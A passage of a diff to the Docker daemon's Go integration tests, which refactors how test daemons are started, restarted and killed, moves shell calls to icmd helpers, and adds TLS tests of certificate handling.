s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), "Public Key ID does not match") { c.Fatalf("Missing KeyID message from daemon logs: %s", string(content)) @@ -1349,9 +1242,7 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { } 
func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat") if err != nil { @@ -1363,9 +1254,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out) } - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) errchan := make(chan error) go func() { @@ -1391,14 +1280,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-cert.pem", "--tlskey", "fixtures/https/client-key.pem", "info", @@ -1416,10 +1308,8 @@ func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c, "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + 
"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, @@ -1454,14 +1344,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-rogue-cert.pem", "--tlskey", "fixtures/https/client-rogue-key.pem", "info", @@ -1479,14 +1372,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { errCaUnknown = "x509: certificate signed by unknown authority" testDaemonRogueHTTPSAddr = "tcp://localhost:4272" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem", - "--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-rogue-cert.pem", + "--tlskey", "fixtures/https/server-rogue-key.pem", + "-H", testDaemonRogueHTTPSAddr) args := []string{ "--host", testDaemonRogueHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-rogue-cert.pem", "--tlskey", "fixtures/https/client-rogue-key.pem", 
"info", @@ -1497,10 +1393,10 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { } } -func pingContainers(c *check.C, d *Daemon, expectFailure bool) { +func pingContainers(c *check.C, d *daemon.Daemon, expectFailure bool) { var dargs []string if d != nil { - dargs = []string{"--host", d.sock()} + dargs = []string{"--host", d.Sock()} } args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top") @@ -1522,72 +1418,78 @@ func pingContainers(c *check.C, d *Daemon, expectFailure bool) { } func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) - socket := filepath.Join(s.d.folder, "docker.sock") + socket := filepath.Join(s.d.Folder, "docker.sock") out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) } // os.Kill should kill daemon ungracefully, leaving behind container mounts. -// A subsequent daemon restart shoud clean up said mounts. +// A subsequent daemon restart should clean up said mounts. func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.StartWithBusybox(c) - out, err := s.d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) - c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + + // If there are no mounts with container id visible from the host + // (as those are in container's own mount ns), there is nothing + // to check here and the test should be skipped. 
mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + if !strings.Contains(string(mountOut), id) { + d.Stop(c) + c.Skip("no container mounts visible in host ns") + } - // container mounts should exist even after daemon has crashed. - comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) - c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + // kill the daemon + c.Assert(d.Kill(), check.IsNil) // kill the container - runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id) - } + icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", moby_daemon.ContainersNamespace, "tasks", "kill", id).Assert(c, icmd.Success) // restart daemon. - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + d.Restart(c) // Now, container mounts should be gone. mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) + + d.Stop(c) } // os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts. 
func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.StartWithBusybox(c) - out, err := s.d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) // Send SIGINT and daemon should clean up - c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil) + c.Assert(d.Signal(os.Interrupt), check.IsNil) // Wait for the daemon to stop. - c.Assert(<-s.d.wait, checker.IsNil) + c.Assert(<-d.Wait, checker.IsNil) mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) } func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace) - c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil) + s.d.StartWithBusybox(c, "-b", "none") out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) @@ -1614,16 +1516,12 @@ func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t) if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil { t.Fatal(out, err) } - if err := s.d.Restart(); err != nil { - t.Fatal(err) - } + s.d.Restart(t) // Container 'test' should be 
removed without error if out, err := s.d.Cmd("rm", "test"); err != nil { t.Fatal(out, err) @@ -1631,9 +1529,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top") if err != nil { c.Fatal(out, err) @@ -1651,51 +1547,50 @@ func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { } // Test if the file still exists - out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) - out = strings.TrimSpace(out) - c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out)) + icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{ + Out: fileName, + }) // Remove the container and restart the daemon if out, err := s.d.Cmd("rm", "netns"); err != nil { c.Fatal(out, err) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) // Test again and see now the netns file does not exist - out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) - out = strings.TrimSpace(out) - c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out)) + icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{ + Err: "No such file or directory", + ExitCode: 1, + }) } // tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) { host := "tcp://localhost:4271" - c.Assert(s.d.Start("-H", host), check.IsNil) - cmd := exec.Command(dockerBinary, "-H", host, "info") - cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"} - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out)) - 
c.Assert(strings.Contains(out, "error during connect"), check.Equals, true) - + s.d.Start(c, "-H", host) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "-H", host, "info"}, + Env: []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"}, + }).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "error during connect", + }) } func setupV6(c *check.C) { // Hack to get the right IPv6 address on docker0, which has already been created result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0") - result.Assert(c, icmd.Expected{}) + result.Assert(c, icmd.Success) } func teardownV6(c *check.C) { result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0") - result.Assert(c, icmd.Expected{}) + result.Assert(c, icmd.Success) } func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") c.Assert(err, check.IsNil) @@ -1710,7 +1605,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway c.Assert(err, check.IsNil) c.Assert(out, check.Equals, "") - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("ps", "-q") c.Assert(err, check.IsNil) @@ -1718,9 +1613,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway } func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { - if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-opt=max-size=1k") name := "logtest" out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err)) @@ -1736,18 +1629,14 @@ func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { - 
if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil { c.Fatal(err, out) } if out, err := s.d.Cmd("pause", "test"); err != nil { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) errchan := make(chan error) go func() { @@ -1773,12 +1662,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox") c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("volume", "rm", "test") c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart")) @@ -1786,54 +1675,52 @@ func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) { - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) _, err := s.d.Cmd("volume", "create", "test") c.Assert(err, check.IsNil) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) _, err = s.d.Cmd("volume", "inspect", "test") c.Assert(err, check.IsNil) } +// FIXME(vdemeester) should be a unit test func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) { - c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) - expected := "Failed to set log opts: syslog-address should be in form proto://address" - runCmd := exec.Command("grep", expected, s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) - } + d := daemon.New(c, dockerBinary, dockerdBinary, 
testdaemon.WithEnvironment(testEnv.Execution)) + c.Assert(d.StartWithError("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) + expected := "syslog-address should be in form proto://address" + icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success) } +// FIXME(vdemeester) should be a unit test func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) { - c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) - expected := "Failed to set log opts: invalid fluentd-address corrupted:c: " - runCmd := exec.Command("grep", expected, s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) - } + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + c.Assert(d.StartWithError("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) + expected := "invalid fluentd-address corrupted:c: " + icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success) } +// FIXME(vdemeester) Use a new daemon instance instead of the Suite one func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) { - s.d.useDefaultHost = true + s.d.UseDefaultHost = true defer func() { - s.d.useDefaultHost = false + s.d.UseDefaultHost = false }() - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) } -func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { - s.d.useDefaultTLSHost = true +// FIXME(vdemeester) Use a new daemon instance instead of the Suite one +func (s *DockerDaemonSuite) TestDaemonStartWithDefaultTLSHost(c *check.C) { + s.d.UseDefaultTLSHost = true defer func() { - s.d.useDefaultTLSHost = false + s.d.UseDefaultTLSHost = false }() - if err := s.d.Start( + s.d.Start(c, "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", 
"fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + "--tlskey", "fixtures/https/server-key.pem") // The client with --tlsverify should also use default host localhost:2376 tmpHost := os.Getenv("DOCKER_HOST") @@ -1854,6 +1741,33 @@ func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { if !strings.Contains(out, "Server") { c.Fatalf("docker version should return information of server side") } + + // ensure when connecting to the server that only a single acceptable CA is requested + contents, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) + rootCert, err := helpers.ParseCertificatePEM(contents) + c.Assert(err, checker.IsNil) + rootPool := x509.NewCertPool() + rootPool.AddCert(rootCert) + + var certRequestInfo *tls.CertificateRequestInfo + conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort), &tls.Config{ + RootCAs: rootPool, + GetClientCertificate: func(cri *tls.CertificateRequestInfo) (*tls.Certificate, error) { + certRequestInfo = cri + cert, err := tls.LoadX509KeyPair("fixtures/https/client-cert.pem", "fixtures/https/client-key.pem") + if err != nil { + return nil, err + } + return &cert, nil + }, + }) + c.Assert(err, checker.IsNil) + conn.Close() + + c.Assert(certRequestInfo, checker.NotNil) + c.Assert(certRequestInfo.AcceptableCAs, checker.HasLen, 1) + c.Assert(certRequestInfo.AcceptableCAs[0], checker.DeepEquals, rootCert.RawSubject) } func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) { @@ -1863,14 +1777,13 @@ func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) bridgeIP := "192.169.1.1" bridgeRange := bridgeIP + "/30" - err := s.d.StartWithBusybox("--bip", bridgeRange) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bip", bridgeRange) + defer s.d.Restart(c) var cont int for { contName 
:= fmt.Sprintf("container%d", cont) - _, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") + _, err := s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") if err != nil { // pool exhausted break @@ -1893,38 +1806,29 @@ func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) { c.Assert(mount.MakeRShared(testDir), checker.IsNil) defer mount.Unmount(testDir) - // create a 2MiB image and mount it as graph root + // create a 3MiB image (with a 2MiB ext4 fs) and mount it as graph root // Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile) - dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0") - out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox - c.Assert(err, checker.IsNil, check.Commentf(out)) - - cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img")) - loout, err := cmd.CombinedOutput() - c.Assert(err, checker.IsNil) - loopname := strings.TrimSpace(string(loout)) - defer exec.Command("losetup", "-d", loopname).Run() + dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=3 count=0") + icmd.RunCommand("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img")).Assert(c, icmd.Success) - dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname)) + dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", "mkdir -p /test/test-mount && mount -n /test/testfs.img /test/test-mount") defer mount.Unmount(filepath.Join(testDir, "test-mount")) - err = s.d.Start("--graph", 
filepath.Join(testDir, "test-mount")) - defer s.d.Stop() - c.Assert(err, check.IsNil) + s.d.Start(c, "--data-root", filepath.Join(testDir, "test-mount")) + defer s.d.Stop(c) - // pull a repository large enough to fill the mount point - pullOut, err := s.d.Cmd("pull", "registry:2") + // pull a repository large enough to overfill the mounted filesystem + pullOut, err := s.d.Cmd("pull", "debian:stretch") c.Assert(err, checker.NotNil, check.Commentf(pullOut)) c.Assert(pullOut, checker.Contains, "no space left on device") } // Test daemon restart with container links + auto restart func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) - parent1Args := []string{} - parent2Args := []string{} + var parent1Args []string + var parent2Args []string wg := sync.WaitGroup{} maxChildren := 10 chErr := make(chan error, maxChildren) @@ -1940,7 +1844,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { } go func() { - _, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + _, err := s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") chErr <- err wg.Done() }() @@ -1957,18 +1861,16 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { parent2Args = append([]string{"run", "-d"}, parent2Args...) parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...) - _, err = s.d.Cmd(parent1Args...) + _, err := s.d.Cmd(parent1Args...) c.Assert(err, check.IsNil) _, err = s.d.Cmd(parent2Args...) 
c.Assert(err, check.IsNil) - err = s.d.Stop() - c.Assert(err, check.IsNil) + s.d.Stop(c) // clear the log file -- we don't need any of it but may for the next part // can ignore the error here, this is just a cleanup os.Truncate(s.d.LogFileName(), 0) - err = s.d.Start() - c.Assert(err, check.IsNil) + s.d.Start(c) for _, num := range []string{"1", "2"} { out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num) @@ -1986,13 +1888,12 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { cgroupParent := "test" name := "cgroup-test" - err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--cgroup-parent", cgroupParent) + defer s.d.Restart(c) out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup") c.Assert(err, checker.IsNil) - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out))) out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name) c.Assert(err, checker.IsNil) @@ -2010,8 +1911,7 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2019,7 +1919,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc") c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) // should fail since test is not running yet out, err = s.d.Cmd("start", "test2") @@ -2034,8 +1934,7 @@ func (s 
*DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("create", "--name=test", "busybox") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2047,7 +1946,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top") test3ID := strings.TrimSpace(out) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("create", "--name=test", "busybox") c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name")) @@ -2081,14 +1980,11 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { // TestDaemonRestartWithKilledRunningContainer requires live restore of running containers func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) { - // TODO(mlaventure): Not sure what would the exit code be on windows testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox(); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t) cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") - defer s.d.Stop() + defer s.d.Stop(t) if err != nil { t.Fatal(cid, err) } @@ -2104,24 +2000,20 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check } // kill the container - runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid) - } + icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", 
moby_daemon.ContainersNamespace, "tasks", "kill", cid).Assert(t, icmd.Success) // Give time to containerd to process the command if we don't // the exit event might be received after we do the inspect - pidCmd := exec.Command("kill", "-0", pid) - _, ec, _ := runCommandWithOutput(pidCmd) - for ec == 0 { + result := icmd.RunCommand("kill", "-0", pid) + for result.ExitCode == 0 { time.Sleep(1 * time.Second) - _, ec, _ = runCommandWithOutput(pidCmd) + // FIXME(vdemeester) should we check it doesn't error out ? + result = icmd.RunCommand("kill", "-0", pid) } // restart the daemon - if err := s.d.Start(); err != nil { - t.Fatal(err) - } + s.d.Start(t) // Check that we've got the correct exit code out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid) @@ -2139,24 +2031,27 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check // them now, should remove the mounts. func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { testRequires(c, DaemonIsLinux) - c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil) + s.d.StartWithBusybox(c, "--live-restore") out, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) - c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + // kill the daemon + c.Assert(s.d.Kill(), check.IsNil) + + // Check if there are mounts with container id visible from the host. + // If not, those mounts exist in container's own mount ns, and so + // the following check for mounts being cleared is pointless. + skipMountCheck := false mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - - // container mounts should exist even after daemon has crashed. 
